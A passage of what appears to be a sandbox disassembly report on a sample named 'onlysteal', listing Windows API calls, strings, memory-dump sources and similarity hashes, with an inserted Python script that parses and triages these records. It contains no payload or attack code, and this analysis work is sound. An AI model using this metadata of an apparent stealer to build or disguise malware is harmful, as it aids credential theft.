                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: .lnk$d$
                                      • API String ID: 2691759472-2573257209
                                      • Opcode ID: 2c813f4040ab0f3a7ea56c8b31b3f8b6f9aa30e25b895d39ce9e448c9198483c
                                      • Instruction ID: 11818f74aa3cabdca9efc603259bde822a244fcc1c0abd79ea016bf408e81bce
                                      • Opcode Fuzzy Hash: 2c813f4040ab0f3a7ea56c8b31b3f8b6f9aa30e25b895d39ce9e448c9198483c
                                      • Instruction Fuzzy Hash: E6A1537292012A96DF29DFA0CD45EFA73FCAF44304F0885A6F909E7141EE749B948F60
                                      APIs
                                      • _free.LIBCMT ref: 0025B324
                                        • Part of subcall function 00259097: IsProcessorFeaturePresent.KERNEL32(00000017,00259086,00000050,00263A34,?,0023D710,00000004,00271030,?,?,00259093,00000000,00000000,00000000,00000000,00000000), ref: 00259099
                                        • Part of subcall function 00259097: GetCurrentProcess.KERNEL32(C0000417,00263A34,00000050,00271030), ref: 002590BB
                                        • Part of subcall function 00259097: TerminateProcess.KERNEL32(00000000), ref: 002590C2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                      • String ID: *?$.
                                      • API String ID: 2667617558-3972193922
                                      • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                      • Instruction ID: 557b5a0ed5b0b62e92759ffff65da01df99cad471fdc48051cdeefcb181dfaf2
                                      • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                      • Instruction Fuzzy Hash: 7451A071E1010AEFDF15CFA8C881AADBBB5EF58311F2481A9EC44E7340E7719A158B54
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 002375E3
                                        • Part of subcall function 002405DA: _wcslen.LIBCMT ref: 002405E0
                                        • Part of subcall function 0023A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0023A598
                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0023777F
                                        • Part of subcall function 0023A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0023A325,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A501
                                        • Part of subcall function 0023A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0023A325,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A532
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                      • String ID: :
                                      • API String ID: 3226429890-336475711
                                      • Opcode ID: c7aa4124e5cc68cdc4512203ef8d050453e045c9bbe923fb50a5e31412e03e62
                                      • Instruction ID: e571079132a59fb98c33210e3bcca0e206fa6c20e59f559b2e506c880d56d1c3
                                      • Opcode Fuzzy Hash: c7aa4124e5cc68cdc4512203ef8d050453e045c9bbe923fb50a5e31412e03e62
                                      • Instruction Fuzzy Hash: F74163F1821158A9EF35EB64CC56EEEB37CAF51300F404096B645A2092DB745FE9CF60
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: *
                                      • API String ID: 2691759472-163128923
                                      • Opcode ID: fbd58c0a7383e20a9ddfb7f9914aae672d2581e7e648a1ce025d77983f4fcb48
                                      • Instruction ID: 32d7be97f4803bb4d455a04547dcdbe23f2404050be4d73c6ad3df85b99580a1
                                      • Opcode Fuzzy Hash: fbd58c0a7383e20a9ddfb7f9914aae672d2581e7e648a1ce025d77983f4fcb48
                                      • Instruction Fuzzy Hash: EE3188F6534313AACB32EE00982267B73E4DF95B10F14801EFF8853043E7628DA1932A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: }
                                      • API String ID: 176396367-4239843852
                                      • Opcode ID: e7264f2c6b1843af72f7ccfedf4607f9428a108d640250c4b96e58721166b15b
                                      • Instruction ID: 817c62beebb99065bb62b6c29269d5e70017761060d598882190d44abd1ec4d6
                                      • Opcode Fuzzy Hash: e7264f2c6b1843af72f7ccfedf4607f9428a108d640250c4b96e58721166b15b
                                      • Instruction Fuzzy Hash: D72101729243065AD73AEF64D845A6AB3ECDF90750F40042AF940C3141EBB4DD6887A2
                                      APIs
                                        • Part of subcall function 0023F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0023F2E4
                                        • Part of subcall function 0023F2C5: GetProcAddress.KERNEL32(002781C8,CryptUnprotectMemory), ref: 0023F2F4
                                      • GetCurrentProcessId.KERNEL32(?,?,?,0023F33E), ref: 0023F3D2
                                      Strings
                                      • CryptUnprotectMemory failed, xrefs: 0023F3CA
                                      • CryptProtectMemory failed, xrefs: 0023F389
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AddressProc$CurrentProcess
                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                      • API String ID: 2190909847-396321323
                                      • Opcode ID: 11fddbbe0e43cad211815a4a63d2c0594357d15457f3dda3401abbb8895763cc
                                      • Instruction ID: e098c20afbff591a978e86bc823cf1adc9ca2760b6af43ddb84439145a378764
                                      • Opcode Fuzzy Hash: 11fddbbe0e43cad211815a4a63d2c0594357d15457f3dda3401abbb8895763cc
                                      • Instruction Fuzzy Hash: 6F1159B1E2036AABDF519F20FE49A6E3718FF00710F0480A6FC055B251DA749D618A90
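The records in this report follow a fixed layout: an APIs list whose entries carry a `ref:` address and, for indirect calls, a `Part of subcall function` prefix; a Strings list with `xrefs:`; the memory-dump source; and the Similarity identifiers. The entry above, which resolves CryptProtectMemory and CryptUnprotectMemory through GetProcAddress rather than importing them, is the kind of block worth pulling out of several thousand lines automatically. The following is an added example written for this page; it is not part of Joe Sandbox or its IDA plugin. It parses that layout and applies a few triage heuristics (a literal symbol name passed to GetProcAddress, thread creation, TerminateProcess), which are the editor's own choices. The record grammar is inferred from the report text, so it assumes that API argument lists never contain a closing parenthesis and that a record without direct API calls or strings simply lacks those headers. `SAMPLE` is a constructed input trimmed from three records on this page.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SECTION_HEADERS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# Matches e.g. "Part of subcall function 0023F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0023F2E4"
# Assumption: argument lists never contain ')' (holds for every record on this page).
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
HEX_OR_UNKNOWN = re.compile(r"^(?:[0-9A-F]{8}|\?)$")  # arguments the plugin could not resolve to a literal

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]  # address of the callee when the API is reached through a subcall

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    similarity: Dict[str, str] = field(default_factory=dict)

def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    rec, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            # A record normally starts at "APIs"; a record with no API or string
            # entries has no such header, so any header after "Similarity" starts one too.
            if rec is None or line == "APIs" or section == "Similarity":
                rec = FunctionRecord()
                records.append(rec)
            section = line
            continue
        if rec is None:
            continue
        body = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                args = m["args"].split(",") if m["args"] is not None else []
                rec.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
        elif section == "Strings":
            head, sep, _xref = body.rpartition(", xrefs: ")
            rec.strings.append(head if sep else body)
        elif section == "Similarity":
            key, _, value = body.partition(":")
            rec.similarity[key.strip()] = value.strip()
    return records

def literal_args(call: ApiCall) -> List[str]:
    """Arguments the plugin resolved to a literal, e.g. a symbol name or a path."""
    return [a for a in call.args if a and not HEX_OR_UNKNOWN.match(a)]

def triage(rec: FunctionRecord) -> List[str]:
    """Editor's own heuristics: behaviours in this report that deserve a second look."""
    findings = []
    for call in rec.apis:
        where = f" via subcall {call.subcall}" if call.subcall else ""
        if call.name == "GetProcAddress":
            findings += [f"runtime import of {sym}{where}" for sym in literal_args(call)]
        elif call.name in ("CreateThread", "CreateRemoteThread", "TerminateProcess"):
            findings.append(f"{call.name}{where}")
    return findings

def api_histogram(records: List[FunctionRecord]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for rec in records:
        for call in rec.apis:
            counts[call.name] = counts.get(call.name, 0) + 1
    return counts

# Constructed sample: three records from this page, trimmed to the lines the parser needs.
SAMPLE = r"""
APIs
  • Part of subcall function 0023F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0023F2E4
  • Part of subcall function 0023F2C5: GetProcAddress.KERNEL32(002781C8,CryptUnprotectMemory), ref: 0023F2F4
• GetCurrentProcessId.KERNEL32(?,?,?,0023F33E), ref: 0023F3D2
Strings
• CryptUnprotectMemory failed, xrefs: 0023F3CA
• CryptProtectMemory failed, xrefs: 0023F389
Similarity
• API ID: AddressProc$CurrentProcess
• String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
• API String ID: 2190909847-396321323
APIs
• CreateThread.KERNEL32(00000000,00010000,00241160,?,00000000,00000000), ref: 00241043
• SetThreadPriority.KERNEL32(?,00000000), ref: 0024108A
Similarity
• API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
• String ID: CreateThread failed
Memory Dump Source
• Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
Similarity
• API ID: _wcslen
• String ID: Software\WinRAR SFX$$
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for i, rec in enumerate(recs):
        print(i, rec.similarity.get("API ID"), triage(rec))
    print(api_histogram(recs))
```

Run it over the full report text (with the rendered-page link labels stripped) to get one FunctionRecord per block; `api_histogram` then shows which imports dominate, and `triage` surfaces blocks such as the CryptProtectMemory resolver above without reading every record. The values the report lists under Similarity (API ID, String ID, Opcode ID and the fuzzy hashes) are kept verbatim in `similarity`, so they can be compared across reports of related samples.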
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00010000,00241160,?,00000000,00000000), ref: 00241043
                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 0024108A
                                        • Part of subcall function 00236C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00236C54
                                        • Part of subcall function 00236DCB: _wcschr.LIBVCRUNTIME ref: 00236E0A
                                        • Part of subcall function 00236DCB: _wcschr.LIBVCRUNTIME ref: 00236E19
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                      • String ID: CreateThread failed
                                      • API String ID: 2706921342-3849766595
                                      • Opcode ID: e83ef5c5bd52d30d3453e0e5a860cb9780608d28d24eac3a7e7713299a75b3b9
                                      • Instruction ID: 50aecfca68e1854d50ea4c31ed6ec7f303992911acce9af4605a04421f113bcc
                                      • Opcode Fuzzy Hash: e83ef5c5bd52d30d3453e0e5a860cb9780608d28d24eac3a7e7713299a75b3b9
                                      • Instruction Fuzzy Hash: C5012BF53603097BD3346F24AC4AB76735CEB50751F20402EF98A52184CAF0A8F44624
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: <9&$?*<>|"
                                      • API String ID: 2691759472-2877517911
                                      • Opcode ID: c63baac53a9521de53124275fb4d228602b720f9eddd60f33c58d2d9f0560038
                                      • Instruction ID: c776526e99691657634b074d0ed9e29cb5fc819a8137ffc1e07726be0915a9ab
                                      • Opcode Fuzzy Hash: c63baac53a9521de53124275fb4d228602b720f9eddd60f33c58d2d9f0560038
                                      • Instruction Fuzzy Hash: F2F0D197A75382C1C7386E289801732B3E8EFA1320F34081EE4C4A72D2E6A188E08765
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: Software\WinRAR SFX$$
                                      • API String ID: 176396367-2260685054
                                      • Opcode ID: 1e1a7f1b3f69c578b077a175b4acfc960e88e6444506effb03ced23f4168697e
                                      • Instruction ID: 745238a7866ef3a6915c2507416a55a8e9748ff4881d4cbe6812a0493e930e07
                                      • Opcode Fuzzy Hash: 1e1a7f1b3f69c578b077a175b4acfc960e88e6444506effb03ced23f4168697e
                                      • Instruction Fuzzy Hash: EE018B31910129BAEB21DB91EC0EFDF7F7CFF457A4F004052B509A10A0D7B18AA8CBA1
                                      APIs
                                        • Part of subcall function 0023C29A: _wcslen.LIBCMT ref: 0023C2A2
                                        • Part of subcall function 00241FDD: _wcslen.LIBCMT ref: 00241FE5
                                        • Part of subcall function 00241FDD: _wcslen.LIBCMT ref: 00241FF6
                                        • Part of subcall function 00241FDD: _wcslen.LIBCMT ref: 00242006
                                        • Part of subcall function 00241FDD: _wcslen.LIBCMT ref: 00242014
                                        • Part of subcall function 00241FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0023B371,?,?,00000000,?,?,?), ref: 0024202F
                                        • Part of subcall function 0024AC04: SetCurrentDirectoryW.KERNELBASE(?,0024AE72,C:\Users\user\Desktop,00000000,0027946A,00000006), ref: 0024AC08
                                      • _wcslen.LIBCMT ref: 0024AE8B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen$CompareCurrentDirectoryString
                                      • String ID: <$$C:\Users\user\Desktop
                                      • API String ID: 521417927-3202247355
                                      • Opcode ID: b0e7c505ee4fcd3df1dbfc0afecd54db411cb1af52f4d176b4a1816969db5030
                                      • Instruction ID: 3cd50e30a0877138fa7088ca3ccab76744b152c31a9ba963c2c2856d25306e6c
                                      • Opcode Fuzzy Hash: b0e7c505ee4fcd3df1dbfc0afecd54db411cb1af52f4d176b4a1816969db5030
                                      • Instruction Fuzzy Hash: EF017171D50319A6DF15ABA4ED4AEDF73FCAF08300F000466F606E3191E6B496A48FA5
                                      APIs
                                        • Part of subcall function 002597E5: GetLastError.KERNEL32(?,00271030,00254674,00271030,?,?,00253F73,00000050,?,00271030,00000200), ref: 002597E9
                                        • Part of subcall function 002597E5: _free.LIBCMT ref: 0025981C
                                        • Part of subcall function 002597E5: SetLastError.KERNEL32(00000000,?,00271030,00000200), ref: 0025985D
                                        • Part of subcall function 002597E5: _abort.LIBCMT ref: 00259863
                                      • _abort.LIBCMT ref: 0025BB80
                                      • _free.LIBCMT ref: 0025BBB4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ErrorLast_abort_free
                                      • String ID: p&
                                      • API String ID: 289325740-4236815001
                                      • Opcode ID: 6cc78bf015391767444b7f974ae7227b3a95014bac6578feb8a3d68b57092245
                                      • Instruction ID: 7549cfdf0e2fc2f1e1dc9bb320cf2b7a6e5bb8e5d0ebf38c67e4e2117722f84d
                                      • Opcode Fuzzy Hash: 6cc78bf015391767444b7f974ae7227b3a95014bac6578feb8a3d68b57092245
                                      • Instruction Fuzzy Hash: AE01D675D21622DBCF22AF68940222DB7B0BF04736B16010AFC2467295DBF56D658FC9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Malloc
                                      • String ID: ($$Z$
                                      • API String ID: 2696272793-3003454490
                                      • Opcode ID: 1fc9e7d9bf61cd6b5eace7243a285a6dc077fcdbd4ee5b11ebca3417873712b2
                                      • Instruction ID: 50eeb70f41173e616a3c4d11300c7717a1c56c9b478d3b1ee85ffb55cc9d09b5
                                      • Opcode Fuzzy Hash: 1fc9e7d9bf61cd6b5eace7243a285a6dc077fcdbd4ee5b11ebca3417873712b2
                                      • Instruction Fuzzy Hash: FC0146B6610109FF9F05DFB0EC59CAEBBBDEF08344700415AB906D7120E631AE44DBA0
                                      APIs
                                        • Part of subcall function 0025BF30: GetEnvironmentStringsW.KERNEL32 ref: 0025BF39
                                        • Part of subcall function 0025BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0025BF5C
                                        • Part of subcall function 0025BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0025BF82
                                        • Part of subcall function 0025BF30: _free.LIBCMT ref: 0025BF95
                                        • Part of subcall function 0025BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0025BFA4
                                      • _free.LIBCMT ref: 002582AE
                                      • _free.LIBCMT ref: 002582B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                      • String ID: 0")
                                      • API String ID: 400815659-1042997966
                                      • Opcode ID: 3b917e57cb87bf935a52b7bb69b8b811e3018bb9f32205bbb10aa198348cfa69
                                      • Instruction ID: e1bd5f787e37e1d474a95092dceb9684ce7da5a839d5560b1303debf596e22b0
                                      • Opcode Fuzzy Hash: 3b917e57cb87bf935a52b7bb69b8b811e3018bb9f32205bbb10aa198348cfa69
                                      • Instruction Fuzzy Hash: 2CE0E533A3698291AB6136393C0262F2A404B8133BF140216FE10E60C3CEF0883E0CAE
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,00241206,?), ref: 00240FEA
                                      • GetLastError.KERNEL32(?), ref: 00240FF6
                                        • Part of subcall function 00236C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00236C54
                                      Strings
                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00240FFF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                      • API String ID: 1091760877-2248577382
                                      • Opcode ID: 2dde65a7c00d36b4d5655ad3724ce61a0640e37e9ed4982e0413b08a145c02e1
                                      • Instruction ID: 3eed890855bb9de2c00fae8f37ff2919e9c99191bc1858a54b6d986d2c7ade94
                                      • Opcode Fuzzy Hash: 2dde65a7c00d36b4d5655ad3724ce61a0640e37e9ed4982e0413b08a145c02e1
                                      • Instruction Fuzzy Hash: 82D02EB25281203AC6103728AC0ED6F3C088F22331F348B05F838602E6CB2989F14A96
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,0023DA55,?), ref: 0023E2A3
                                      • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0023DA55,?), ref: 0023E2B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
